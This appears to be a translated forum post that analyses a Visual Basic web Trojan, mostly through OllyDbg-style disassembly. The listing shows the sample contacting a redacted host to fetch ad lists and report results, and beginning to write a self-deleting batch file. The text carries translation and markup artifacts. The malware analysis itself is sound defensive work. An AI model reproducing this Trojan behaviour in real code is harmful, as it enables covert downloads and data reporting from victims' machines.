After the system had been fully patched, going online still resulted in a connection to www.net.cn, which then dropped its web Trojan — not bad at all; it works across 98, NT, 2000, XP, XP SP2 and 2003. I kept a copy and analyzed the Trojan myself: a traffic Trojan, with a server side. All of the small downloaders ("ponies") are collected here.
Lightly packed, written in VB.
00403DAD. FF15 54104000 call dword ptr ds: [<& msvbvm60. _ vbaHresu>; msvbvm60. _ vbaHresultCheckObj
00403DB3. 8985 E0FCFFFF mov dword ptr ss: [EBP-320], EAX
00403DB9. EB 0A jmp short Rundll32.00403DC5
00403DBB> C785 E0FCFFFF> mov dword ptr ss: [EBP-320], 0
00403DC5> 8B95 60 feffff mov edx, dword ptr ss: [EBP-1A0]
00403DCB. 8995 F8FCFFFF mov dword ptr ss: [EBP-308], EDX
00403DD1. C785 60 FEFFFF> mov dword ptr ss: [EBP-1A0], 0
00403DDB. 8B85 F8FCFFFF mov eax, dword ptr ss: [EBP-308]
00403DE1. 8985 34 feffff mov dword ptr ss: [EBP-1CC], EAX
00403DE7. C785 2 CFEFFFF> mov dword ptr ss: [EBP-1D4], 8
00403DF1. 8D95 2 cfeffff lea edx, dword ptr ss: [EBP-1D4]
00403DF7. 8D8D F8FEFFFF lea ecx, dword ptr ss: [EBP-108]
00403DFD. FF15 08104000 call dword ptr ds: [<& msvbvm60. _ vbaVarMo>; msvbvm60. _ vbaVarMove
00403E03. C745 FC 06000> mov dword ptr ss: [EBP-4], 6
00403E0A. C785 D4FDFFFF> mov dword ptr ss: [EBP-22C], Rundll32.0040>; UNICODE"Http://www.xxxxxxxx.com/tc/adset.txt"
00403E14. C785 CCFDFFFF> mov dword ptr ss: [EBP-234], 8
00403E1E. 8D95 ccfdffff lea edx, dword ptr ss: [EBP-234]
00403E24. 8D4D A0 lea ecx, dword ptr ss: [EBP-60]
00403E27. FF15 70114000 call dword ptr ds: [<& msvbvm60. _ vbaVarCo>; msvbvm60. _ vbaVarCopy
00403E2D. C745 FC 07000> mov dword ptr ss: [EBP-4], 7
00403E34. C785 D4FDFFFF> mov dword ptr ss: [EBP-22C], Rundll32.0040>; UNICODE"Http://www.xxxxxxxx.com/tc/adlist.txt"
00403E3E. C785 CCFDFFFF> mov dword ptr ss: [EBP-234], 8
00403E48. 8D95 ccfdffff lea edx, dword ptr ss: [EBP-234]
00403E4E. 8D8D 6 cffffff lea ecx, dword ptr ss: [EBP-94]
00403E54. FF15 70114000 call dword ptr ds: [<& msvbvm60. _ vbaVarCo>; msvbvm60. _ vbaVarCopy
00403E5A. C745 FC 08000> mov dword ptr ss: [EBP-4], 8
00403E61. C785 D4FDFFFF> mov dword ptr ss: [EBP-22C], Rundll32.0040>; UNICODE "asp" target = _ blank>Http://www.xxxxxxxx.com/tc/MMResult.asp"
00403E6B. C785 CCFDFFFF> mov dword ptr ss: [EBP-234], 8
00403E75. 8D95 ccfdffff lea edx, dword ptr ss: [EBP-234]
00403E7B. 8D4D 8C lea ecx, dword ptr ss: [EBP-74]
00403E7E. FF15 70114000 call dword ptr ds: [<& msvbvm60. _ vbaVarCo>; msvbvm60. _ vbaVarCopy
00403E84. C745 FC 09000> mov dword ptr ss: [EBP-4], 9
00403E8B. C785 D4FDFFFF> mov dword ptr ss: [EBP-22C], Rundll32.0040>; UNICODE"Http://www.xxxxxxxx.com/tc/adiepage.txt"
00403E95. C785 CCFDFFFF> mov dword ptr ss: [EBP-234], 8
00403E9F. 8D95 ccfdffff lea edx, dword ptr ss: [EBP-234]
00403EA5. 8D8D B8FEFFFF lea ecx, dword ptr ss: [EBP-148]
00403EAB. FF15 70114000 call dword ptr ds: [<& msvbvm60. _ vbaVarCo>; msvbvm60. _ vbaVarCopy
00403EB1. C745 FC 0A000> mov dword ptr ss: [EBP-4], 0A
00403EB8. C785 D4FDFFFF> mov dword ptr ss: [EBP-22C], Rundll32.0040>; UNICODE"Http://www.xxxxxxxx.com/tc/ieFavorites.txt"
00403EC2. C785 CCFDFFFF> mov dword ptr ss: [EBP-234], 8
00403ECC. 8D95 ccfdffff lea edx, dword ptr ss: [EBP-234]
00403ED2. 8D8D 7 cffffff lea ecx, dword ptr ss: [EBP-84]
00403ED8. FF15 70114000 call dword ptr ds: [<& msvbvm60. _ vbaVarCo>; msvbvm60. _ vbaVarCopy
00403EDE. C745 FC 0B000> mov dword ptr ss: [EBP-4], 0B
00403EE5. C785 D4FDFFFF> mov dword ptr ss: [EBP-22C], Rundll32.0040>; UNICODE "WinDir"
00403EEF. C785 CCFDFFFF> mov dword ptr ss: [EBP-234], 8
00403EF9. 8D95 ccfdffff lea edx, dword ptr ss: [EBP-234]
00403EFF. 8D8D 2 cfeffff lea ecx, dword ptr ss: [EBP-1D4]
00403F05. FF15 6C114000 call dword ptr ds: [<& msvbvm60. _ vbaVarDu>; msvbvm60. _ vbaVarDup
00403F0B. 8D8D 2 cfeffff lea ecx, dword ptr ss: [EBP-1D4]
00403F11. 51 PUSH ECX
00403F12. 8D95 1 cfeffff lea edx, dword ptr ss: [EBP-1E4]
00403F18. 52 PUSH EDX
00403F19. FF15 60104000 call dword ptr ds: [<& msvbvm60.rtcEnviron>; msvbvm60.rtcEnvironVar
00403F1F. C785 C4FDFFFF> mov dword ptr ss: [EBP-23C], Rundll32.0040>; UNICODE "undll32.exe"
00403F29. C785 BCFDFFFF> mov dword ptr ss: [EBP-244], 8
The program will connect to Http://www.xxxxxxxx.com and access tc/MMResult.asp (the listing above also shows the string constants for tc/adset.txt, tc/adlist.txt, tc/adiepage.txt and tc/ieFavorites.txt being loaded as Variants, and the WinDir environment variable being read via rtcEnvironVar).
Generating a file:
00404DA2./EB 0A jmp short Rundll32.00404DAE // obtain the file path Stack
00404DA4> | C785 88 FCFFFF> mov dword ptr ss: [EBP-378], 0
00404DAE> 8B85 60 feffff mov eax, dword ptr ss: [EBP-1A0] // my program path is "D: fuck you"
00404DB4. 50 push eax // path to eax
00404DB5. 68 80274000 PUSH Rundll32.00402780; // generate killme. bat
00404DBA. FF15 48104000 call dword ptr ds: [<& msvbvm60. _ vbaStrCat>; msvbvm60. _ vbaStrCat
00404DC0. 8BD0 mov edx, EAX // file path + file name D: fuck youkillme. bat
00404DC2. 8D8D 5 cfeffff lea ecx, dword ptr ss: [EBP-1A4]
00404DC8. FF15 80114000 call dword ptr ds: [<& msvbvm60. _ vbaStrMov>; msvbvm60. _ vbaStrMove
00404DCE. 50 PUSH EAX
00404DCF. 6A 01 PUSH 1
00404DD1. 6A ff push-1
00404DD3. 6A 02 PUSH 2
00404DD5. FF15 28114000 call dword ptr ds: [<& msvbvm60. _ vbaFileOp>; msvbvm60. _ vbaFileOpen
00404DDB. 8D8D 5 cfeffff lea ecx, dword ptr ss: [EBP-1A4]
00404DE1. 51 PUSH ECX
00404DE2. 8D95 60 feffff lea edx, dword ptr ss: [EBP-1A0]
00404DE8. 52 PUSH EDX
00404DE9. 6A 02 PUSH 2
00404DEB. FF15 48114000 call dword ptr ds: [<& msvbvm60. _ vbaFreeSt>; msvbvm60. _ vbaFreeStrList
00404DF1. 83C4 0C add esp, 0C
00404DF4. 8D8D 40 feffff lea ecx, dword ptr ss: [EBP-1C0]
00404DFA. FF15 A8114000 call dword ptr ds: [<& msvbvm60. _ vbaFreeOb>; msvbvm60. _ vbaFreeObj
00404E00. C745 FC 23000> mov dword ptr ss: [EBP-4], 23
00404E07. 68 9C274000 PUSH Rundll32.0040279C; @ echo off
00404E0C. 6A 01 PUSH 1
00404E0E. 68 B4274000 PUSH Rundll32.004027B4